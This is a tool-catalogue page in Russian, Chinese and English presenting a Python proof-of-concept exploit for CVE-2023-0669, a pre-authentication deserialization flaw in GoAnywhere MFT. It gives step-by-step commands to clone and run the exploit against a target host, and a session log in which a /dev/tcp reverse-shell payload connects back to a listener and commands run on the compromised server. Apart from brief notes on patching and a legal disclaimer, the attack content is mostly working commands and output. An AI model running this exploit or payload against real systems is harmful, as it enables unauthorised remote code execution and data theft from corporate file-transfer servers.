Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Уязвимости десериализации Python RCE PoC(Концептуальное доказательство) | Kitploit
Инструменты/GitHubGitHub/avento/cve-2023-0669
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Уязвимости десериализации Python RCE PoC(Концептуальное доказательство)

Репозиторий
833 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-0669 GoAnywhere MFT 反序列化 - Je Yiuwai's Blog

CVE-2023-0669

CVE-2023-0669是一个GoAnywhere MFT反序列化漏洞,由于反序列化一个任意攻击者控制的对象,在License Response Servlet中存在一个预先认证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而导致系统被完全控制。该漏洞影响版本为7.1.2之前,不包括7.1.2。

CVE-2023-0669 — это уязвимость десериализации в GoAnywhere MFT, которая существует в LicenseResponseServlet из-за уязвимости инъекции команд до аутентификации. Она позволяет атакующему выполнить произвольный код на затронутой системе путем десериализации объекта, контролируемого атакующим. Уязвимость затрагивает версии до 7.1.2.

该漏洞可能会对企业级文件传输软件GoAnywhere MFT的安全性造成严重威胁。攻击者可以通过利用该漏洞来窃取敏感数据、篡改数据、破坏系统等。因此,用户需要及时采取措施来保护系统安全。

Уязвимость представляет серьезную угрозу для безопасности корпоративного ПО для передачи файлов GoAnywhere MFT. Атакующие могут использовать её для кражи конфиденциальных данных, их подмены и компрометации системы. Поэтому пользователям необходимо своевременно принимать меры для защиты системы.

官方已经发布了安全通告,并提供了初步检查方法。用户可以检查userdata/logs日志中是否有特定字符串出现来判断系统是否受到此漏洞的影响。如果无法更新补丁,建议采取其他安全措施来保护系统安全。

Официальный бюллетень безопасности уже опубликован, и предоставлены предварительные методы проверки. Пользователи могут проверить логи userdata/logs на наличие определенных строк, чтобы определить, затронута ли их система данной уязвимостью. Если невозможно применить патчи, рекомендуется принять другие меры безопасности для защиты системы.

总之,CVE-2023-0669是一个需要引起用户重视的反序列化漏洞,用户需要及时更新到最新版本,并检查系统是否受到此漏洞的影响。同时,建议用户加强对GoAnywhere MFT等企业级软件的安全管理,采取多层次的安全措施来保护系统安全。

В итоге, CVE-2023-0669 — это уязвимость десериализации, требующая внимания пользователей. Пользователям необходимо своевременно обновляться до последней версии и проверять, затронута ли их система данной уязвимостью. Кроме того, рекомендуется усилить управление безопасностью корпоративного ПО, такого как GoAnywhere MFT, и применять многоуровневые меры защиты для обеспечения безопасности системы.

CVE-2023-0669 PoC

简介

Введение

This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.

Данный эксплойт — это скрипт на Python, используемый для эксплуатации уязвимости CVE-2023-0669 в GoAnywhere MFT v6.7.9594 и более ранних версиях.

漏洞描述

Описание уязвимости

This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.

Эта уязвимость существует из-за проблемы безопасности при обработке зашифрованных запросов Bundle в GoAnywhere MFT. Атакующий может отправить специально сформированный запрос для выполнения произвольного кода на целевом сервере.

使用方法

Использование

1.Clone this repository.

Клонируйте этот репозиторий.

root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git

2.Enter the directory.

Перейдите в каталог.

root@kitploit:~
cd CVE-2023-0669

3.Install the dependencies of requests and cryptography.

Установите зависимости: requests и cryptography.

root@kitploit:~
pip install requests cryptography

4.Run the Exploit.

Запустите эксплойт.

root@kitploit:~
python CVE-2023-0669.py --host <target IP>

注意事项

Примечание

  • Running this Exploit requires legal access rights and should not be used for illegal purposes.

  • As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.

  • Для запуска этого эксплойта требуются законные права доступа, и он не должен использоваться в незаконных целях.

  • Так как выполнение этого эксплойта создает риск для целевого сервера, пользователь несет полную ответственность за его риски и последствия.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Author:Je Yiuwai edit by xiaomi pad 6 pro

Скачать инструмент